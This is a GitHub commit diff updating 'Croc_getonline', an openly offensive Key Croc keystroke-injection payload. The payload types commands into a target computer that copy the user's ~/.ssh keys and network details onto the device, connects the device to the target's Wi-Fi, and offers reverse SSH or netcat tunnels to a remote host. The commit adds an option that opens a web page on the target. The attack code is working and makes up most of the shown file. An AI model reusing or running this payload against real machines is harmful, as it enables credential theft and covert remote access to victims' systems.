Update Croc_getonline.txt
minor changes added starting default browser on targetpull/62/head
spywill
GitHub
parent
6e08132c37
commit
3743f48375
|
|
@ -2,7 +2,7 @@
|
|||
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
||||
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
|
||||
# Author: spywill
|
||||
# Version: 4.2
|
||||
# Version: 4.3
|
||||
# Category: Key Croc
|
||||
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
||||
|
||||
|
|
@ -19,13 +19,20 @@
|
|||
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
|
||||
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
|
||||
|
||||
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
|
||||
# option=0 Run payload as normal
|
||||
# option=1 Run payload as normal, open terminal on target
|
||||
# option=2 Run payload as normal, start reverse SSH tunnel using SSH
|
||||
# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT
|
||||
# option=4 Run payload as normal, open web page
|
||||
|
||||
MATCH getonline+_[A-Z]{1}
|
||||
QUACK LOCK
|
||||
|
||||
#---> Edit payload option below
|
||||
option=0
|
||||
keycroc_password=hak5croc
|
||||
wifi_pass=/tools/wifipass.txt
|
||||
web_page=https://forums.hak5.org/
|
||||
|
||||
#---> Edit remote host below
|
||||
remote_user_name=EDIT_REMOTE_USERNAME_HERE
|
||||
|
|
@ -37,10 +44,12 @@ port=7000
|
|||
known_ssid=EDIT_KNOWN_SSID_HERE
|
||||
known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
|
||||
|
||||
#---> Edit recon scan on/off below
|
||||
#---> Edit recon scan on/off below & nmap
|
||||
recon=off
|
||||
nmap_scan="nmap -T4 -F"
|
||||
recon_loot=/root/udisk/tools/Target_SSID.txt
|
||||
|
||||
#---> Edit ICMP/PORT alert on/off below & iptables time out
|
||||
alert=off
|
||||
alert_time=60
|
||||
|
||||
|
|
@ -57,14 +66,14 @@ recon_scan() {
|
|||
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
|
||||
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
||||
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :"
|
||||
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
else
|
||||
|
|
@ -211,31 +220,37 @@ case $LOOT in
|
|||
fi
|
||||
;;
|
||||
getonline_K)
|
||||
ifconfig wlan0 down
|
||||
LED R
|
||||
ifconfig wlan0 down
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_S)
|
||||
ATTACKMODE HID STORAGE
|
||||
sleep 3
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_H)
|
||||
ATTACKMODE HID
|
||||
sleep 3
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_P)
|
||||
ATTACKMODE HID SERIAL
|
||||
sleep 3
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_A)
|
||||
ATTACKMODE HID AUTO_ETHERNET
|
||||
sleep 3
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
getonline_X)
|
||||
LED R
|
||||
rm -f /root/udisk/payloads/Croc_getonline.txt
|
||||
rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt
|
||||
rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt
|
||||
rm -f $recon_loot root/udisk/config.txt
|
||||
rm -f /root/udisk/tools/firewall-rules-backup.txt
|
||||
rm -r /root/udisk/tools/Target_SSH_KEY
|
||||
apt -y remove sshpass
|
||||
reboot --force
|
||||
RESET_PAYLOAD
|
||||
|
|
@ -254,6 +269,12 @@ case $LOOT in
|
|||
:
|
||||
fi
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
*)
|
||||
LED R
|
||||
sleep 1
|
||||
LED OFF
|
||||
RESET_PAYLOAD
|
||||
;;
|
||||
esac
|
||||
sleep 3
|
||||
|
|
@ -285,8 +306,8 @@ if [ "$LOOT" = "getonline_W" ]; then
|
|||
fi
|
||||
|
||||
sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
|
||||
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
|
||||
sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
|
||||
sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
|
||||
sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt
|
||||
wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
|
||||
|
||||
ifconfig wlan0 up
|
||||
|
|
@ -326,7 +347,7 @@ if : >/dev/tcp/8.8.8.8/53; then
|
|||
QUACK ENTER
|
||||
elif [ $option -eq 2 ]; then
|
||||
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
|
||||
[ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass
|
||||
[ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass
|
||||
sleep 1
|
||||
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
||||
[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
|
||||
|
|
@ -345,6 +366,29 @@ if : >/dev/tcp/8.8.8.8/53; then
|
|||
LED R
|
||||
sleep 1
|
||||
fi
|
||||
elif [ $option -eq 4 ]; then
|
||||
if [ "$LOOT" = "getonline_W" ]; then
|
||||
QUACK GUI d
|
||||
QUACK GUI r
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "powershell"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "Start-Process $web_page & exit"
|
||||
QUACK ENTER
|
||||
elif [ "$LOOT" = "getonline_R" ]; then
|
||||
QUACK CONTROL-ALT-d
|
||||
QUACK CONTROL-ALT-t
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "xdg-open $web_page & exit"
|
||||
QUACK ENTER
|
||||
elif [ "$LOOT" = "getonline_L" ]; then
|
||||
QUACK CONTROL-ALT-d
|
||||
QUACK ALT-t
|
||||
QUACK DELAY 2000
|
||||
QUACK STRING "xdg-open $web_page & exit"
|
||||
QUACK ENTER
|
||||
fi
|
||||
else
|
||||
LED FINISH
|
||||
fi
|
||||
|
|
@ -364,7 +408,7 @@ if [ "$recon" = "on" ]; then
|
|||
|
||||
perform_nmap_scan() {
|
||||
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
|
||||
nmap -T4 -F $network_range >> $recon_loot
|
||||
$nmap_scan $network_range >> $recon_loot
|
||||
}
|
||||
calculate_network_range
|
||||
perform_nmap_scan
|
||||
|
|
@ -382,7 +426,7 @@ if [ "$alert" = "on" ]; then
|
|||
icmp_alert() {
|
||||
calculate_network_range
|
||||
sleep 1
|
||||
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do
|
||||
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do
|
||||
:
|
||||
done
|
||||
LED R SLOW
|
||||
|
|
|
|||
Loading…
Reference in New Issue